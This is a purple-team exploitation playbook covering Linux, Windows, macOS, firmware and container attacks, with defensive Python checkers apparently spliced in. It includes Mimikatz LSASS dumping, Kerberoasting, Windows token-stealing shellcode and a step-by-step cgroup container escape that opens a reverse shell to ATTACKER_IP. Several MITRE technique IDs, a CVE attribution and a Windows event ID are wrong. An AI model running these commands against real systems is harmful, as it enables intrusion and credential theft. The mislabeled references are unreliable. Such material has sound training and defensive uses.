OS & hardware exploitation playbook

From stack overflows to kernel exploits and next-gen patch analysis

Linux exploitation

Basic attacks

Stack-based buffer overflow

MITRE: T1205

Tools:

# Crash a vulnerable program with an oversized input
python2 -c 'print "A"*500' | ./vuln_program
# Find the EIP offset with GDB: `pattern create` is a GEF/peda/pwndbg command run at the gdb prompt
gdb -q ./vuln_program
pattern create 500

Exploit development

MITRE: T1068

Tools:

# Python2 exploit skeleton  
from struct import pack  
buf = "A"*264 + pack("<I", 0xdeadbeef)  # EIP overwrite  
open("payload", "wb").write(buf)  

Purple team actions

  • Red: Exploit 32-bit binaries with pwntools.

  • Blue: Deploy PaX/Grsecurity to enforce NX/ASLR.
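The Blue action above only helps if you can see which binaries actually ship with NX, PIE and RELRO. As an added example (not code from the playbook), a minimal ELF64 checker that reads the program headers the way checksec does; the two sample images are constructed inline so it runs offline.

```python
import struct
import sys

# ELF64 constants (values from glibc's elf.h).
ET_DYN = 3
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X = 1

def elf_mitigations(data: bytes) -> dict:
    """Report NX, PIE and (partial) RELRO for a little-endian ELF64 image.

    NX:    PT_GNU_STACK present without PF_X. A missing header is reported as
           no NX (the checksec convention: older kernels then map the stack RWX).
    PIE:   e_type == ET_DYN, so ASLR can relocate the whole image.
    RELRO: a PT_GNU_RELRO segment exists. Full RELRO additionally needs BIND_NOW
           in the dynamic section, which this minimal check does not inspect.
    """
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx = relro = False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"nx": nx, "pie": e_type == ET_DYN, "relro": relro}

def make_elf64(e_type: int, phdrs) -> bytes:
    """Constructed minimal ELF64 image (header + program headers, no code) so the
    checker can be exercised offline; it is not a loadable binary."""
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr += struct.pack("<HHIQQQIHHHHHH", e_type, 0x3E, 1, 0, 64, 0, 0,
                        64, 56, len(phdrs), 64, 0, 0)
    return ehdr + b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0)
                           for t, f in phdrs)

# Constructed samples: a legacy ET_EXEC build with an RWX stack, and a hardened PIE.
WEAK_ELF = make_elf64(2, [(PT_GNU_STACK, 7)])
HARDENED_ELF = make_elf64(ET_DYN, [(PT_GNU_STACK, 6), (PT_GNU_RELRO, 4)])

if __name__ == "__main__":
    # Usage: python3 elfcheck.py /path/to/binary ...  (no args: built-in samples)
    targets = {p: open(p, "rb").read() for p in sys.argv[1:]} or \
              {"weak": WEAK_ELF, "hardened": HARDENED_ELF}
    for name, blob in targets.items():
        print(name, elf_mitigations(blob))
```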

Advanced Linux bypasses

Attack paths

ROP Chaining (NX Bypass)

MITRE: T1497

Tools:

# Find gadgets with ROPgadget  
ROPgadget --binary libc.so.6 | grep "pop rdi"  

ASLR/PIE Leak

MITRE: T1599

Tools:

# Leak libc address via format string  
payload = "%7$s".ljust(8) + p64(libc.got["puts"])  

Purple team actions

  • Red: Use angr for automated ROP chain generation.

  • Blue: Enable CFI and kernel pointer sanitization.

Linux kernel exploits

Attack paths

ret2usr (SMEP Bypass)

MITRE: T1068

Tools:

// Kernel payload to escalate to root  
commit_creds(prepare_kernel_cred(0));  

KASLR Bypass

MITRE: T1599

Tools:

# Leak kernel pointers via /proc/kallsyms  
grep "T startup_64" /proc/kallsyms  

Purple team actions

  • Red: Test DirtyPipe (CVE-2022-0847).

  • Blue: Disable legacy vsyscall and restrict /proc/kallsyms access.

Windows exploitation

Basic attacks

SEH overwrite

MITRE: T1205

Tools:

# SEH chain overwrite pattern  
buf = "A"*500 + "\xeb\x06\x90\x90" + pack("<I", 0x62501203)  

ROP (Bypass DEP)

MITRE: T1497

Tools:

# Find gadgets with Mona (Immunity Debugger)  
!mona rop -m kernel32.dll -cpb "\x00\x0a"  

Purple team actions

  • Red: Exploit Office macros with SharpShooter.

  • Blue: Enforce EMET or WDEG.

Windows kernel exploits

Attack paths

Token stealing

MITRE: T1098

Tools:

// Kernel shellcode to steal SYSTEM token  
mov rax, [gs:0x188]      // Current thread  
mov rax, [rax+0xb8]      // EPROCESS  
mov rbx, [rax+0x2e8]     // SYSTEM EPROCESS  

Driver exploitation

MITRE: T1068

Tools:

# Find vulnerable drivers with DriverQuery  
driverquery /v | findstr "UNSAFE"  

Purple team actions

  • Red: Exploit PrintNightmare.

  • Blue: Block vulnerable drivers via HVCI.

PowerShell & post-exploitation

Attack paths

Credential theft

MITRE: T1003

Tools:

# Dump LSASS with Mimikatz  
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'  

AD Persistence

MITRE: T1098

Tools:

# Kerberoast service accounts (not a Golden Ticket: this only requests service tickets and exports their hashes)
Invoke-Kerberoast -OutputFormat Hashcat | % { $_.Hash } | Out-File hashes.txt

Purple team actions

  • Red: Lateral movement with Rubeus.

  • Blue: Monitor for 4624 (Kerberos TGT requests).
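Detection side of the Kerberoast line above, as an added example that is not part of the playbook: service ticket requests are logged as event 4769, and a burst of RC4 (0x17) tickets for user-account SPNs from one requester is the signature of a bulk Kerberoast. Field names follow the 4769 event XML; the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4; AES tickets are 0x11/0x12

# Constructed, already-parsed 4769 ("A Kerberos service ticket was requested")
# events; not real telemetry.
SAMPLE_4769 = [
    {"time": "2025-05-17T10:00:01", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.5"},
    {"time": "2025-05-17T10:00:02", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.5"},
    {"time": "2025-05-17T10:00:03", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.5"},
    {"time": "2025-05-17T10:00:04", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.9"},
    {"time": "2025-05-17T10:07:00", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.7"},
]

def is_rc4_service_request(ev: dict) -> bool:
    """RC4 ticket for a user-account SPN; machine accounts ($) and krbtgt are normal."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def kerberoast_alerts(events, window=timedelta(minutes=5), threshold=3) -> list:
    """Flag (user, source IP) pairs that pull RC4 tickets for at least `threshold`
    distinct user SPNs inside `window`: the pattern a mass Kerberoast produces."""
    by_requester = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if is_rc4_service_request(ev):
            by_requester[(ev["TargetUserName"], ev["IpAddress"])].append(ev)
    alerts = []
    for (user, ip), evs in by_requester.items():
        for i, first in enumerate(evs):          # sliding window over the requester's events
            t0 = datetime.fromisoformat(first["time"])
            in_window = [e for e in evs[i:]
                         if datetime.fromisoformat(e["time"]) - t0 <= window]
            spns = sorted({e["ServiceName"] for e in in_window})
            if len(spns) >= threshold:
                alerts.append({"user": user, "ip": ip, "services": spns,
                               "first_seen": first["time"]})
                break
    return alerts

if __name__ == "__main__":
    for a in kerberoast_alerts(SAMPLE_4769):
        print(f"possible Kerberoast: {a['user']} from {a['ip']} -> {a['services']}")
```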

macOS exploitation

XNU Heap Overflow (CVE-2021-30860)

Attack path

MITRE: T1068

Exploit Steps:

// Trigger IOMFB vulnerability (simplified)  
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOMobileFramebuffer"));  
IOConnectCallMethod(service, 78, input, inputCnt, output, &outputCnt);  // OOB write  

Purple team actions

  • Red: Weaponize with MacDirtyCow (CVE-2022-46689).

  • Blue: Enable System Integrity Protection (SIP) and monitor kernel_task crashes.

Next-Gen patch exploitation

Attack paths

Binary diffing

MITRE: T1599

Tools:

# Patch diffing with BinDiff  
bindiff old.exe new.exe  

1-Day exploits

MITRE: T1599

Tools:

# Reverse engineer patch Tuesday updates  
from binaryninja import *  
bv = BinaryViewType.get_view_of_file("patched.dll")  

Purple team actions

  • Red: Develop exploits from PatchDiffing results.

  • Blue: Deploy SigCheck for binary integrity.

Firmware diffing (UEFI/ACPI)

Attack paths

UEFI vulnerability hunting

MITRE: T1542.001

Tools:

# Extract firmware with CHIPSEC  
python3 chipsec_util.py spi dump firmware.rom  
# Diff UEFI modules with UEFITool  
uefitool firmware.rom extract -o modules  

ACPI table tampering

MITRE: T1542.002

Tools:

# Dump ACPI tables in Linux  
acpidump > acpi.dat  
# Disassemble AML with iasl  
iasl -d dsdt.dat  

Purple team actions

  • Red: Exploit Thunderstrike (UEFI bootkit).

  • Blue: Verify firmware with Linux Vendor Firmware Service.

Container escape exploits

CVE-2022-0492 (cgroups v1 Release Agent Escape)

Attack path

MITRE: T1611 (Escape to Host)

Exploit Steps:

# 1. Check vulnerable cgroups config  
grep cgroup /proc/self/mountinfo | grep release_agent  

# 2. Trigger escape (requires CAP_SYS_ADMIN in container)  
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp  
echo 1 > /tmp/cgrp/notify_on_release  
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)  
echo "$host_path/cmd" > /tmp/cgrp/release_agent  
echo '#!/bin/sh' > /cmd  
echo "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" >> /cmd  
chmod +x /cmd  
sh -c "echo \$\$ > /tmp/cgrp/cgroup.procs"  

Purple team actions

  • Red: Test escape in Docker/Kubernetes with CDK.

  • Blue: Enforce deny mount cgroup in AppArmor.
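The Blue action above is easier to enforce if pod specs are checked for the settings the escape steps depend on before they reach the node. As an added example (not part of the playbook), an admission-style check over a Kubernetes pod spec; the two pod specs are constructed, and it assumes the cluster's default AppArmor profile is runtime/default when no annotation is present.

```python
APPARMOR_PREFIX = "container.apparmor.security.beta.kubernetes.io/"

def cgroup_escape_exposure(pod: dict) -> list:
    """Return a finding per condition that would let a container carry out the
    steps above: mount a v1 cgroupfs (privileged or CAP_SYS_ADMIN), run as root,
    and sidestep the AppArmor 'deny mount' rule by running unconfined."""
    findings = []
    annotations = pod.get("metadata", {}).get("annotations", {})
    spec = pod.get("spec", {})
    pod_sc = spec.get("securityContext", {})
    for c in spec.get("containers", []):
        name, sc = c["name"], c.get("securityContext", {})
        caps_add = {x.upper() for x in sc.get("capabilities", {}).get("add", [])}
        if sc.get("privileged"):
            findings.append(f"{name}: privileged=true (every capability, cgroupfs mountable)")
        elif caps_add & {"SYS_ADMIN", "ALL"}:
            findings.append(f"{name}: CAP_SYS_ADMIN added, cgroupfs mountable")
        # Assumption: no annotation means the runtime/default profile applies.
        if annotations.get(APPARMOR_PREFIX + name, "runtime/default") == "unconfined":
            findings.append(f"{name}: AppArmor unconfined, 'deny mount' does not apply")
        if not (sc.get("runAsNonRoot") or pod_sc.get("runAsNonRoot")):
            findings.append(f"{name}: may run as uid 0 (runAsNonRoot unset)")
    return findings

# Constructed pod specs for the demo (not taken from a real cluster).
EXPOSED_POD = {
    "metadata": {"name": "debug", "annotations": {APPARMOR_PREFIX + "shell": "unconfined"}},
    "spec": {"containers": [{"name": "shell", "image": "busybox",
                             "securityContext": {"privileged": True}}]},
}
HARDENED_POD = {
    "metadata": {"name": "web"},
    "spec": {"securityContext": {"runAsNonRoot": True},
             "containers": [{"name": "app", "image": "nginx",
                             "securityContext": {"allowPrivilegeEscalation": False,
                                                 "capabilities": {"drop": ["ALL"]}}}]},
}

if __name__ == "__main__":
    for pod in (EXPOSED_POD, HARDENED_POD):
        print(pod["metadata"]["name"], cgroup_escape_exposure(pod) or ["ok"])
```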

Purple team outcomes

Red team

  • Linux: ROP chains bypassing NX+PIE+ASLR.

  • Windows: Weaponized Office docs with CVE-2021-40444.

  • AD: Golden/Silver ticket attack trees.

  • Container: Proof-of-concept for Kubernetes pod → host escapes.

  • macOS: Weaponized XNU exploits (e.g., privilege escalation to root).

  • Firmware: Mapped UEFI vulnerabilities to ATT&CK for ICS.

Blue team

  • Linux: eBPF-based kernel exploit detection.

  • Windows: Attack Surface Reduction rules.

  • AD: BloodHound defensive mappings.

  • Container: GKE/ECS hardening guides with gVisor.

  • macOS: Gatekeeper + XProtect rules.

  • Firmware: UEFI Secure Boot enforcement via Microsoft DBX.

Final deliverable

  • Workshop: Kernel exploit lab (Linux/Windows).

  • ATT&CK Navigator: Customized Enterprise + ICS layers.

  • Patch Analysis: Monthly diffing report template.

Last update: 2025-05-17 10:05